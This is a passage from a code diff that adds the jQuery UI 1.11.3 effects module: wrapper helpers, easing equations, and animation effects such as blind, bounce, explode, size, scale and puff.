+	getBaseline: function( origin, original ) {
+		var y, x;
+		switch ( origin[ 0 ] ) {
+			case "top": y = 0; break;
+			case "middle": y = 0.5; break;
+			case "bottom": y = 1; break;
+			default: y = origin[ 0 ] / original.height;
+		}
+		switch ( origin[ 1 ] ) {
+			case "left": x = 0; break;
+			case "center": x = 0.5; break;
+			case "right": x = 1; break;
+			default: x = origin[ 1 ] / original.width;
+		}
+		return {
+			x: x,
+			y: y
+		};
+	},
+
+	// Wraps the element around a wrapper that copies position properties
+	createWrapper: function( element ) {
+
+		// if the element is already wrapped, return it
+		if ( element.parent().is( ".ui-effects-wrapper" )) {
+			return element.parent();
+		}
+
+		// wrap the element
+		var props = {
+				width: element.outerWidth(true),
+				height: element.outerHeight(true),
+				"float": element.css( "float" )
+			},
+			wrapper = $( "<div></div>" )
+				.addClass( "ui-effects-wrapper" )
+				.css({
+					fontSize: "100%",
+					background: "transparent",
+					border: "none",
+					margin: 0,
+					padding: 0
+				}),
+			// Store the size in case width/height are defined in % - Fixes #5245
+			size = {
+				width: element.width(),
+				height: element.height()
+			},
+			active = document.activeElement;
+
+		// support: Firefox
+		// Firefox incorrectly exposes anonymous content
+		// https://bugzilla.mozilla.org/show_bug.cgi?id=561664
+		try {
+			active.id;
+		} catch ( e ) {
+			active = document.body;
+		}
+
+		element.wrap( wrapper );
+
+		// Fixes #7595 - Elements lose focus when wrapped.
+		if ( element[ 0 ] === active || $.contains( element[ 0 ], active ) ) {
+			$( active ).focus();
+		}
+
+		wrapper = element.parent(); //Hotfix for jQuery 1.4 since some change in wrap() seems to actually lose the reference to the wrapped element
+
+		// transfer positioning properties to the wrapper
+		if ( element.css( "position" ) === "static" ) {
+			wrapper.css({ position: "relative" });
+			element.css({ position: "relative" });
+		} else {
+			$.extend( props, {
+				position: element.css( "position" ),
+				zIndex: element.css( "z-index" )
+			});
+			$.each([ "top", "left", "bottom", "right" ], function(i, pos) {
+				props[ pos ] = element.css( pos );
+				if ( isNaN( parseInt( props[ pos ], 10 ) ) ) {
+					props[ pos ] = "auto";
+				}
+			});
+			element.css({
+				position: "relative",
+				top: 0,
+				left: 0,
+				right: "auto",
+				bottom: "auto"
+			});
+		}
+		element.css(size);
+
+		return wrapper.css( props ).show();
+	},
+
+	removeWrapper: function( element ) {
+		var active = document.activeElement;
+
+		if ( element.parent().is( ".ui-effects-wrapper" ) ) {
+			element.parent().replaceWith( element );
+
+			// Fixes #7595 - Elements lose focus when wrapped.
+			if ( element[ 0 ] === active || $.contains( element[ 0 ], active ) ) {
+				$( active ).focus();
+			}
+		}
+
+		return element;
+	},
+
+	setTransition: function( element, list, factor, value ) {
+		value = value || {};
+		$.each( list, function( i, x ) {
+			var unit = element.cssUnit( x );
+			if ( unit[ 0 ] > 0 ) {
+				value[ x ] = unit[ 0 ] * factor + unit[ 1 ];
+			}
+		});
+		return value;
+	}
+});
+
+// return an effect options object for the given parameters:
+function _normalizeArguments( effect, options, speed, callback ) {
+
+	// allow passing all options as the first parameter
+	if ( $.isPlainObject( effect ) ) {
+		options = effect;
+		effect = effect.effect;
+	}
+
+	// convert to an object
+	effect = { effect: effect };
+
+	// catch (effect, null, ...)
+	if ( options == null ) {
+		options = {};
+	}
+
+	// catch (effect, callback)
+	if ( $.isFunction( options ) ) {
+		callback = options;
+		speed = null;
+		options = {};
+	}
+
+	// catch (effect, speed, ?)
+	if ( typeof options === "number" || $.fx.speeds[ options ] ) {
+		callback = speed;
+		speed = options;
+		options = {};
+	}
+
+	// catch (effect, options, callback)
+	if ( $.isFunction( speed ) ) {
+		callback = speed;
+		speed = null;
+	}
+
+	// add options to effect
+	if ( options ) {
+		$.extend( effect, options );
+	}
+
+	speed = speed || options.duration;
+	effect.duration = $.fx.off ? 0 :
+		typeof speed === "number" ? speed :
+		speed in $.fx.speeds ? $.fx.speeds[ speed ] :
+		$.fx.speeds._default;
+
+	effect.complete = callback || options.complete;
+
+	return effect;
+}
+
+function standardAnimationOption( option ) {
+	// Valid standard speeds (nothing, number, named speed)
+	if ( !option || typeof option === "number" || $.fx.speeds[ option ] ) {
+		return true;
+	}
+
+	// Invalid strings - treat as "normal" speed
+	if ( typeof option === "string" && !$.effects.effect[ option ] ) {
+		return true;
+	}
+
+	// Complete callback
+	if ( $.isFunction( option ) ) {
+		return true;
+	}
+
+	// Options hash (but not naming an effect)
+	if ( typeof option === "object" && !option.effect ) {
+		return true;
+	}
+
+	// Didn't match any standard API
+	return false;
+}
+
+$.fn.extend({
+	effect: function( /* effect, options, speed, callback */ ) {
+		var args = _normalizeArguments.apply( this, arguments ),
+			mode = args.mode,
+			queue = args.queue,
+			effectMethod = $.effects.effect[ args.effect ];
+
+		if ( $.fx.off || !effectMethod ) {
+			// delegate to the original method (e.g., .show()) if possible
+			if ( mode ) {
+				return this[ mode ]( args.duration, args.complete );
+			} else {
+				return this.each( function() {
+					if ( args.complete ) {
+						args.complete.call( this );
+					}
+				});
+			}
+		}
+
+		function run( next ) {
+			var elem = $( this ),
+				complete = args.complete,
+				mode = args.mode;
+
+			function done() {
+				if ( $.isFunction( complete ) ) {
+					complete.call( elem[0] );
+				}
+				if ( $.isFunction( next ) ) {
+					next();
+				}
+			}
+
+			// If the element already has the correct final state, delegate to
+			// the core methods so the internal tracking of "olddisplay" works.
+			if ( elem.is( ":hidden" ) ? mode === "hide" : mode === "show" ) {
+				elem[ mode ]();
+				done();
+			} else {
+				effectMethod.call( elem[0], args, done );
+			}
+		}
+
+		return queue === false ? this.each( run ) : this.queue( queue || "fx", run );
+	},
+
+	show: (function( orig ) {
+		return function( option ) {
+			if ( standardAnimationOption( option ) ) {
+				return orig.apply( this, arguments );
+			} else {
+				var args = _normalizeArguments.apply( this, arguments );
+				args.mode = "show";
+				return this.effect.call( this, args );
+			}
+		};
+	})( $.fn.show ),
+
+	hide: (function( orig ) {
+		return function( option ) {
+			if ( standardAnimationOption( option ) ) {
+				return orig.apply( this, arguments );
+			} else {
+				var args = _normalizeArguments.apply( this, arguments );
+				args.mode = "hide";
+				return this.effect.call( this, args );
+			}
+		};
+	})( $.fn.hide ),
+
+	toggle: (function( orig ) {
+		return function( option ) {
+			if ( standardAnimationOption( option ) || typeof option === "boolean" ) {
+				return orig.apply( this, arguments );
+			} else {
+				var args = _normalizeArguments.apply( this, arguments );
+				args.mode = "toggle";
+				return this.effect.call( this, args );
+			}
+		};
+	})( $.fn.toggle ),
+
+	// helper functions
+	cssUnit: function(key) {
+		var style = this.css( key ),
+			val = [];
+
+		$.each( [ "em", "px", "%", "pt" ], function( i, unit ) {
+			if ( style.indexOf( unit ) > 0 ) {
+				val = [ parseFloat( style ), unit ];
+			}
+		});
+		return val;
+	}
+});
+
+})();
+
+/******************************************************************************/
+/*********************************** EASING ***********************************/
+/******************************************************************************/
+
+(function() {
+
+// based on easing equations from Robert Penner (http://www.robertpenner.com/easing)
+
+var baseEasings = {};
+
+$.each( [ "Quad", "Cubic", "Quart", "Quint", "Expo" ], function( i, name ) {
+	baseEasings[ name ] = function( p ) {
+		return Math.pow( p, i + 2 );
+	};
+});
+
+$.extend( baseEasings, {
+	Sine: function( p ) {
+		return 1 - Math.cos( p * Math.PI / 2 );
+	},
+	Circ: function( p ) {
+		return 1 - Math.sqrt( 1 - p * p );
+	},
+	Elastic: function( p ) {
+		return p === 0 || p === 1 ? p :
+			-Math.pow( 2, 8 * (p - 1) ) * Math.sin( ( (p - 1) * 80 - 7.5 ) * Math.PI / 15 );
+	},
+	Back: function( p ) {
+		return p * p * ( 3 * p - 2 );
+	},
+	Bounce: function( p ) {
+		var pow2,
+			bounce = 4;
+
+		while ( p < ( ( pow2 = Math.pow( 2, --bounce ) ) - 1 ) / 11 ) {}
+		return 1 / Math.pow( 4, 3 - bounce ) - 7.5625 * Math.pow( ( pow2 * 3 - 2 ) / 22 - p, 2 );
+	}
+});
+
+$.each( baseEasings, function( name, easeIn ) {
+	$.easing[ "easeIn" + name ] = easeIn;
+	$.easing[ "easeOut" + name ] = function( p ) {
+		return 1 - easeIn( 1 - p );
+	};
+	$.easing[ "easeInOut" + name ] = function( p ) {
+		return p < 0.5 ?
+			easeIn( p * 2 ) / 2 :
+			1 - easeIn( p * -2 + 2 ) / 2;
+	};
+});
+
+})();
+
+var effect = $.effects;
+
+
+/*!
+ * jQuery UI Effects Blind 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/blind-effect/
+ */
+
+
+var effectBlind = $.effects.effect.blind = function( o, done ) {
+	// Create element
+	var el = $( this ),
+		rvertical = /up|down|vertical/,
+		rpositivemotion = /up|left|vertical|horizontal/,
+		props = [ "position", "top", "bottom", "left", "right", "height", "width" ],
+		mode = $.effects.setMode( el, o.mode || "hide" ),
+		direction = o.direction || "up",
+		vertical = rvertical.test( direction ),
+		ref = vertical ? "height" : "width",
+		ref2 = vertical ? "top" : "left",
+		motion = rpositivemotion.test( direction ),
+		animation = {},
+		show = mode === "show",
+		wrapper, distance, margin;
+
+	// if already wrapped, the wrapper's properties are my property. #6245
+	if ( el.parent().is( ".ui-effects-wrapper" ) ) {
+		$.effects.save( el.parent(), props );
+	} else {
+		$.effects.save( el, props );
+	}
+	el.show();
+	wrapper = $.effects.createWrapper( el ).css({
+		overflow: "hidden"
+	});
+
+	distance = wrapper[ ref ]();
+	margin = parseFloat( wrapper.css( ref2 ) ) || 0;
+
+	animation[ ref ] = show ? distance : 0;
+	if ( !motion ) {
+		el
+			.css( vertical ? "bottom" : "right", 0 )
+			.css( vertical ? "top" : "left", "auto" )
+			.css({ position: "absolute" });
+
+		animation[ ref2 ] = show ? margin : distance + margin;
+	}
+
+	// start at 0 if we are showing
+	if ( show ) {
+		wrapper.css( ref, 0 );
+		if ( !motion ) {
+			wrapper.css( ref2, margin + distance );
+		}
+	}
+
+	// Animate
+	wrapper.animate( animation, {
+		duration: o.duration,
+		easing: o.easing,
+		queue: false,
+		complete: function() {
+			if ( mode === "hide" ) {
+				el.hide();
+			}
+			$.effects.restore( el, props );
+			$.effects.removeWrapper( el );
+			done();
+		}
+	});
+};
+
+
+/*!
+ * jQuery UI Effects Bounce 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/bounce-effect/
+ */
+
+
+var effectBounce = $.effects.effect.bounce = function( o, done ) {
+	var el = $( this ),
+		props = [ "position", "top", "bottom", "left", "right", "height", "width" ],
+
+		// defaults:
+		mode = $.effects.setMode( el, o.mode || "effect" ),
+		hide = mode === "hide",
+		show = mode === "show",
+		direction = o.direction || "up",
+		distance = o.distance,
+		times = o.times || 5,
+
+		// number of internal animations
+		anims = times * 2 + ( show || hide ? 1 : 0 ),
+		speed = o.duration / anims,
+		easing = o.easing,
+
+		// utility:
+		ref = ( direction === "up" || direction === "down" ) ? "top" : "left",
+		motion = ( direction === "up" || direction === "left" ),
+		i,
+		upAnim,
+		downAnim,
+
+		// we will need to re-assemble the queue to stack our animations in place
+		queue = el.queue(),
+		queuelen = queue.length;
+
+	// Avoid touching opacity to prevent clearType and PNG issues in IE
+	if ( show || hide ) {
+		props.push( "opacity" );
+	}
+
+	$.effects.save( el, props );
+	el.show();
+	$.effects.createWrapper( el ); // Create Wrapper
+
+	// default distance for the BIGGEST bounce is the outer Distance / 3
+	if ( !distance ) {
+		distance = el[ ref === "top" ? "outerHeight" : "outerWidth" ]() / 3;
+	}
+
+	if ( show ) {
+		downAnim = { opacity: 1 };
+		downAnim[ ref ] = 0;
+
+		// if we are showing, force opacity 0 and set the initial position
+		// then do the "first" animation
+		el.css( "opacity", 0 )
+			.css( ref, motion ? -distance * 2 : distance * 2 )
+			.animate( downAnim, speed, easing );
+	}
+
+	// start at the smallest distance if we are hiding
+	if ( hide ) {
+		distance = distance / Math.pow( 2, times - 1 );
+	}
+
+	downAnim = {};
+	downAnim[ ref ] = 0;
+	// Bounces up/down/left/right then back to 0 -- times * 2 animations happen here
+	for ( i = 0; i < times; i++ ) {
+		upAnim = {};
+		upAnim[ ref ] = ( motion ? "-=" : "+=" ) + distance;
+
+		el.animate( upAnim, speed, easing )
+			.animate( downAnim, speed, easing );
+
+		distance = hide ? distance * 2 : distance / 2;
+	}
+
+	// Last Bounce when Hiding
+	if ( hide ) {
+		upAnim = { opacity: 0 };
+		upAnim[ ref ] = ( motion ? "-=" : "+=" ) + distance;
+
+		el.animate( upAnim, speed, easing );
+	}
+
+	el.queue(function() {
+		if ( hide ) {
+			el.hide();
+		}
+		$.effects.restore( el, props );
+		$.effects.removeWrapper( el );
+		done();
+	});
+
+	// inject all the animations we just queued to be first in line (after "inprogress")
+	if ( queuelen > 1) {
+		queue.splice.apply( queue,
+			[ 1, 0 ].concat( queue.splice( queuelen, anims + 1 ) ) );
+	}
+	el.dequeue();
+
+};
+
+
+/*!
+ * jQuery UI Effects Clip 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/clip-effect/
+ */
+
+
+var effectClip = $.effects.effect.clip = function( o, done ) {
+	// Create element
+	var el = $( this ),
+		props = [ "position", "top", "bottom", "left", "right", "height", "width" ],
+		mode = $.effects.setMode( el, o.mode || "hide" ),
+		show = mode === "show",
+		direction = o.direction || "vertical",
+		vert = direction === "vertical",
+		size = vert ? "height" : "width",
+		position = vert ? "top" : "left",
+		animation = {},
+		wrapper, animate, distance;
+
+	// Save & Show
+	$.effects.save( el, props );
+	el.show();
+
+	// Create Wrapper
+	wrapper = $.effects.createWrapper( el ).css({
+		overflow: "hidden"
+	});
+	animate = ( el[0].tagName === "IMG" ) ? wrapper : el;
+	distance = animate[ size ]();
+
+	// Shift
+	if ( show ) {
+		animate.css( size, 0 );
+		animate.css( position, distance / 2 );
+	}
+
+	// Create Animation Object:
+	animation[ size ] = show ? distance : 0;
+	animation[ position ] = show ? 0 : distance / 2;
+
+	// Animate
+	animate.animate( animation, {
+		queue: false,
+		duration: o.duration,
+		easing: o.easing,
+		complete: function() {
+			if ( !show ) {
+				el.hide();
+			}
+			$.effects.restore( el, props );
+			$.effects.removeWrapper( el );
+			done();
+		}
+	});
+
+};
+
+
+/*!
+ * jQuery UI Effects Drop 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/drop-effect/
+ */
+
+
+var effectDrop = $.effects.effect.drop = function( o, done ) {
+
+	var el = $( this ),
+		props = [ "position", "top", "bottom", "left", "right", "opacity", "height", "width" ],
+		mode = $.effects.setMode( el, o.mode || "hide" ),
+		show = mode === "show",
+		direction = o.direction || "left",
+		ref = ( direction === "up" || direction === "down" ) ? "top" : "left",
+		motion = ( direction === "up" || direction === "left" ) ? "pos" : "neg",
+		animation = {
+			opacity: show ? 1 : 0
+		},
+		distance;
+
+	// Adjust
+	$.effects.save( el, props );
+	el.show();
+	$.effects.createWrapper( el );
+
+	distance = o.distance || el[ ref === "top" ? "outerHeight" : "outerWidth" ]( true ) / 2;
+
+	if ( show ) {
+		el
+			.css( "opacity", 0 )
+			.css( ref, motion === "pos" ? -distance : distance );
+	}
+
+	// Animation
+	animation[ ref ] = ( show ?
+		( motion === "pos" ? "+=" : "-=" ) :
+		( motion === "pos" ? "-=" : "+=" ) ) +
+		distance;
+
+	// Animate
+	el.animate( animation, {
+		queue: false,
+		duration: o.duration,
+		easing: o.easing,
+		complete: function() {
+			if ( mode === "hide" ) {
+				el.hide();
+			}
+			$.effects.restore( el, props );
+			$.effects.removeWrapper( el );
+			done();
+		}
+	});
+};
+
+
+/*!
+ * jQuery UI Effects Explode 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/explode-effect/
+ */
+
+
+var effectExplode = $.effects.effect.explode = function( o, done ) {
+
+	var rows = o.pieces ? Math.round( Math.sqrt( o.pieces ) ) : 3,
+		cells = rows,
+		el = $( this ),
+		mode = $.effects.setMode( el, o.mode || "hide" ),
+		show = mode === "show",
+
+		// show and then visibility:hidden the element before calculating offset
+		offset = el.show().css( "visibility", "hidden" ).offset(),
+
+		// width and height of a piece
+		width = Math.ceil( el.outerWidth() / cells ),
+		height = Math.ceil( el.outerHeight() / rows ),
+		pieces = [],
+
+		// loop
+		i, j, left, top, mx, my;
+
+	// children animate complete:
+	function childComplete() {
+		pieces.push( this );
+		if ( pieces.length === rows * cells ) {
+			animComplete();
+		}
+	}
+
+	// clone the element for each row and cell.
+	for ( i = 0; i < rows ; i++ ) { // ===>
+		top = offset.top + i * height;
+		my = i - ( rows - 1 ) / 2 ;
+
+		for ( j = 0; j < cells ; j++ ) { // |||
+			left = offset.left + j * width;
+			mx = j - ( cells - 1 ) / 2 ;
+
+			// Create a clone of the now hidden main element that will be absolute positioned
+			// within a wrapper div off the -left and -top equal to size of our pieces
+			el
+				.clone()
+				.appendTo( "body" )
+				.wrap( "<div></div>" )
+				.css({
+					position: "absolute",
+					visibility: "visible",
+					left: -j * width,
+					top: -i * height
+				})
+
+			// select the wrapper - make it overflow: hidden and absolute positioned based on
+			// where the original was located +left and +top equal to the size of pieces
+				.parent()
+				.addClass( "ui-effects-explode" )
+				.css({
+					position: "absolute",
+					overflow: "hidden",
+					width: width,
+					height: height,
+					left: left + ( show ? mx * width : 0 ),
+					top: top + ( show ? my * height : 0 ),
+					opacity: show ? 0 : 1
+				}).animate({
+					left: left + ( show ? 0 : mx * width ),
+					top: top + ( show ? 0 : my * height ),
+					opacity: show ? 1 : 0
+				}, o.duration || 500, o.easing, childComplete );
+		}
+	}
+
+	function animComplete() {
+		el.css({
+			visibility: "visible"
+		});
+		$( pieces ).remove();
+		if ( !show ) {
+			el.hide();
+		}
+		done();
+	}
+};
+
+
+/*!
+ * jQuery UI Effects Fade 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/fade-effect/
+ */
+
+
+var effectFade = $.effects.effect.fade = function( o, done ) {
+	var el = $( this ),
+		mode = $.effects.setMode( el, o.mode || "toggle" );
+
+	el.animate({
+		opacity: mode
+	}, {
+		queue: false,
+		duration: o.duration,
+		easing: o.easing,
+		complete: done
+	});
+};
+
+
+/*!
+ * jQuery UI Effects Fold 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/fold-effect/
+ */
+
+
+var effectFold = $.effects.effect.fold = function( o, done ) {
+
+	// Create element
+	var el = $( this ),
+		props = [ "position", "top", "bottom", "left", "right", "height", "width" ],
+		mode = $.effects.setMode( el, o.mode || "hide" ),
+		show = mode === "show",
+		hide = mode === "hide",
+		size = o.size || 15,
+		percent = /([0-9]+)%/.exec( size ),
+		horizFirst = !!o.horizFirst,
+		widthFirst = show !== horizFirst,
+		ref = widthFirst ? [ "width", "height" ] : [ "height", "width" ],
+		duration = o.duration / 2,
+		wrapper, distance,
+		animation1 = {},
+		animation2 = {};
+
+	$.effects.save( el, props );
+	el.show();
+
+	// Create Wrapper
+	wrapper = $.effects.createWrapper( el ).css({
+		overflow: "hidden"
+	});
+	distance = widthFirst ?
+		[ wrapper.width(), wrapper.height() ] :
+		[ wrapper.height(), wrapper.width() ];
+
+	if ( percent ) {
+		size = parseInt( percent[ 1 ], 10 ) / 100 * distance[ hide ? 0 : 1 ];
+	}
+	if ( show ) {
+		wrapper.css( horizFirst ? {
+			height: 0,
+			width: size
+		} : {
+			height: size,
+			width: 0
+		});
+	}
+
+	// Animation
+	animation1[ ref[ 0 ] ] = show ? distance[ 0 ] : size;
+	animation2[ ref[ 1 ] ] = show ? distance[ 1 ] : 0;
+
+	// Animate
+	wrapper
+		.animate( animation1, duration, o.easing )
+		.animate( animation2, duration, o.easing, function() {
+			if ( hide ) {
+				el.hide();
+			}
+			$.effects.restore( el, props );
+			$.effects.removeWrapper( el );
+			done();
+		});
+
+};
+
+
+/*!
+ * jQuery UI Effects Highlight 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/highlight-effect/
+ */
+
+
+var effectHighlight = $.effects.effect.highlight = function( o, done ) {
+	var elem = $( this ),
+		props = [ "backgroundImage", "backgroundColor", "opacity" ],
+		mode = $.effects.setMode( elem, o.mode || "show" ),
+		animation = {
+			backgroundColor: elem.css( "backgroundColor" )
+		};
+
+	if (mode === "hide") {
+		animation.opacity = 0;
+	}
+
+	$.effects.save( elem, props );
+
+	elem
+		.show()
+		.css({
+			backgroundImage: "none",
+			backgroundColor: o.color || "#ffff99"
+		})
+		.animate( animation, {
+			queue: false,
+			duration: o.duration,
+			easing: o.easing,
+			complete: function() {
+				if ( mode === "hide" ) {
+					elem.hide();
+				}
+				$.effects.restore( elem, props );
+				done();
+			}
+		});
+};
+
+
+/*!
+ * jQuery UI Effects Size 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/size-effect/
+ */
+
+
+var effectSize = $.effects.effect.size = function( o, done ) {
+
+	// Create element
+	var original, baseline, factor,
+		el = $( this ),
+		props0 = [ "position", "top", "bottom", "left", "right", "width", "height", "overflow", "opacity" ],
+
+		// Always restore
+		props1 = [ "position", "top", "bottom", "left", "right", "overflow", "opacity" ],
+
+		// Copy for children
+		props2 = [ "width", "height", "overflow" ],
+		cProps = [ "fontSize" ],
+		vProps = [ "borderTopWidth", "borderBottomWidth", "paddingTop", "paddingBottom" ],
+		hProps = [ "borderLeftWidth", "borderRightWidth", "paddingLeft", "paddingRight" ],
+
+		// Set options
+		mode = $.effects.setMode( el, o.mode || "effect" ),
+		restore = o.restore || mode !== "effect",
+		scale = o.scale || "both",
+		origin = o.origin || [ "middle", "center" ],
+		position = el.css( "position" ),
+		props = restore ? props0 : props1,
+		zero = {
+			height: 0,
+			width: 0,
+			outerHeight: 0,
+			outerWidth: 0
+		};
+
+	if ( mode === "show" ) {
+		el.show();
+	}
+	original = {
+		height: el.height(),
+		width: el.width(),
+		outerHeight: el.outerHeight(),
+		outerWidth: el.outerWidth()
+	};
+
+	if ( o.mode === "toggle" && mode === "show" ) {
+		el.from = o.to || zero;
+		el.to = o.from || original;
+	} else {
+		el.from = o.from || ( mode === "show" ? zero : original );
+		el.to = o.to || ( mode === "hide" ? zero : original );
+	}
+
+	// Set scaling factor
+	factor = {
+		from: {
+			y: el.from.height / original.height,
+			x: el.from.width / original.width
+		},
+		to: {
+			y: el.to.height / original.height,
+			x: el.to.width / original.width
+		}
+	};
+
+	// Scale the css box
+	if ( scale === "box" || scale === "both" ) {
+
+		// Vertical props scaling
+		if ( factor.from.y !== factor.to.y ) {
+			props = props.concat( vProps );
+			el.from = $.effects.setTransition( el, vProps, factor.from.y, el.from );
+			el.to = $.effects.setTransition( el, vProps, factor.to.y, el.to );
+		}
+
+		// Horizontal props scaling
+		if ( factor.from.x !== factor.to.x ) {
+			props = props.concat( hProps );
+			el.from = $.effects.setTransition( el, hProps, factor.from.x, el.from );
+			el.to = $.effects.setTransition( el, hProps, factor.to.x, el.to );
+		}
+	}
+
+	// Scale the content
+	if ( scale === "content" || scale === "both" ) {
+
+		// Vertical props scaling
+		if ( factor.from.y !== factor.to.y ) {
+			props = props.concat( cProps ).concat( props2 );
+			el.from = $.effects.setTransition( el, cProps, factor.from.y, el.from );
+			el.to = $.effects.setTransition( el, cProps, factor.to.y, el.to );
+		}
+	}
+
+	$.effects.save( el, props );
+	el.show();
+	$.effects.createWrapper( el );
+	el.css( "overflow", "hidden" ).css( el.from );
+
+	// Adjust
+	if (origin) { // Calculate baseline shifts
+		baseline = $.effects.getBaseline( origin, original );
+		el.from.top = ( original.outerHeight - el.outerHeight() ) * baseline.y;
+		el.from.left = ( original.outerWidth - el.outerWidth() ) * baseline.x;
+		el.to.top = ( original.outerHeight - el.to.outerHeight ) * baseline.y;
+		el.to.left = ( original.outerWidth - el.to.outerWidth ) * baseline.x;
+	}
+	el.css( el.from ); // set top & left
+
+	// Animate
+	if ( scale === "content" || scale === "both" ) { // Scale the children
+
+		// Add margins/font-size
+		vProps = vProps.concat([ "marginTop", "marginBottom" ]).concat(cProps);
+		hProps = hProps.concat([ "marginLeft", "marginRight" ]);
+		props2 = props0.concat(vProps).concat(hProps);
+
+		el.find( "*[width]" ).each( function() {
+			var child = $( this ),
+				c_original = {
+					height: child.height(),
+					width: child.width(),
+					outerHeight: child.outerHeight(),
+					outerWidth: child.outerWidth()
+				};
+			if (restore) {
+				$.effects.save(child, props2);
+			}
+
+			child.from = {
+				height: c_original.height * factor.from.y,
+				width: c_original.width * factor.from.x,
+				outerHeight: c_original.outerHeight * factor.from.y,
+				outerWidth: c_original.outerWidth * factor.from.x
+			};
+			child.to = {
+				height: c_original.height * factor.to.y,
+				width: c_original.width * factor.to.x,
+				outerHeight: c_original.height * factor.to.y,
+				outerWidth: c_original.width * factor.to.x
+			};
+
+			// Vertical props scaling
+			if ( factor.from.y !== factor.to.y ) {
+				child.from = $.effects.setTransition( child, vProps, factor.from.y, child.from );
+				child.to = $.effects.setTransition( child, vProps, factor.to.y, child.to );
+			}
+
+			// Horizontal props scaling
+			if ( factor.from.x !== factor.to.x ) {
+				child.from = $.effects.setTransition( child, hProps, factor.from.x, child.from );
+				child.to = $.effects.setTransition( child, hProps, factor.to.x, child.to );
+			}
+
+			// Animate children
+			child.css( child.from );
+			child.animate( child.to, o.duration, o.easing, function() {
+
+				// Restore children
+				if ( restore ) {
+					$.effects.restore( child, props2 );
+				}
+			});
+		});
+	}
+
+	// Animate
+	el.animate( el.to, {
+		queue: false,
+		duration: o.duration,
+		easing: o.easing,
+		complete: function() {
+			if ( el.to.opacity === 0 ) {
+				el.css( "opacity", el.from.opacity );
+			}
+			if ( mode === "hide" ) {
+				el.hide();
+			}
+			$.effects.restore( el, props );
+			if ( !restore ) {
+
+				// we need to calculate our new positioning based on the scaling
+				if ( position === "static" ) {
+					el.css({
+						position: "relative",
+						top: el.to.top,
+						left: el.to.left
+					});
+				} else {
+					$.each([ "top", "left" ], function( idx, pos ) {
+						el.css( pos, function( _, str ) {
+							var val = parseInt( str, 10 ),
+								toRef = idx ? el.to.left : el.to.top;
+
+							// if original was "auto", recalculate the new value from wrapper
+							if ( str === "auto" ) {
+								return toRef + "px";
+							}
+
+							return val + toRef + "px";
+						});
+					});
+				}
+			}
+
+			$.effects.removeWrapper( el );
+			done();
+		}
+	});
+
+};
+
+
+/*!
+ * jQuery UI Effects Scale 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/scale-effect/
+ */
+
+
+var effectScale = $.effects.effect.scale = function( o, done ) {
+
+	// Create element
+	var el = $( this ),
+		options = $.extend( true, {}, o ),
+		mode = $.effects.setMode( el, o.mode || "effect" ),
+		percent = parseInt( o.percent, 10 ) ||
+			( parseInt( o.percent, 10 ) === 0 ? 0 : ( mode === "hide" ? 0 : 100 ) ),
+		direction = o.direction || "both",
+		origin = o.origin,
+		original = {
+			height: el.height(),
+			width: el.width(),
+			outerHeight: el.outerHeight(),
+			outerWidth: el.outerWidth()
+		},
+		factor = {
+			y: direction !== "horizontal" ? (percent / 100) : 1,
+			x: direction !== "vertical" ? (percent / 100) : 1
+		};
+
+	// We are going to pass this effect to the size effect:
+	options.effect = "size";
+	options.queue = false;
+	options.complete = done;
+
+	// Set default origin and restore for show/hide
+	if ( mode !== "effect" ) {
+		options.origin = origin || [ "middle", "center" ];
+		options.restore = true;
+	}
+
+	options.from = o.from || ( mode === "show" ? {
+		height: 0,
+		width: 0,
+		outerHeight: 0,
+		outerWidth: 0
+	} : original );
+	options.to = {
+		height: original.height * factor.y,
+		width: original.width * factor.x,
+		outerHeight: original.outerHeight * factor.y,
+		outerWidth: original.outerWidth * factor.x
+	};
+
+	// Fade option to support puff
+	if ( options.fade ) {
+		if ( mode === "show" ) {
+			options.from.opacity = 0;
+			options.to.opacity = 1;
+		}
+		if ( mode === "hide" ) {
+			options.from.opacity = 1;
+			options.to.opacity = 0;
+		}
+	}
+
+	// Animate
+	el.effect( options );
+
+};
+
+
+/*!
+ * jQuery UI Effects Puff 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/puff-effect/
+ */
+
+
+var effectPuff = $.effects.effect.puff = function( o, done ) {
+	var elem = $( this ),
+		mode = $.effects.setMode( elem, o.mode || "hide" ),
+		hide = mode === "hide",
+		percent = parseInt( o.percent, 10 ) || 150,
+		factor = percent / 100,
+		original = {
+			height: elem.height(),
+			width: elem.width(),
+			outerHeight: elem.outerHeight(),
+			outerWidth: elem.outerWidth()
+		};
+
+	$.extend( o, {
+		effect: "scale",
+		queue: false,
+		fade: true,
+		mode: mode,
+		complete: done,
+		percent: hide ? percent : 100,
+		from: hide ?
+			original :
+			{
+				height: original.height * factor,
+				width: original.width * factor,
+				outerHeight: original.outerHeight * factor,
+				outerWidth: original.outerWidth * factor
+			}
+	});
+
+	elem.effect( o );
+};
+
+
+/*!
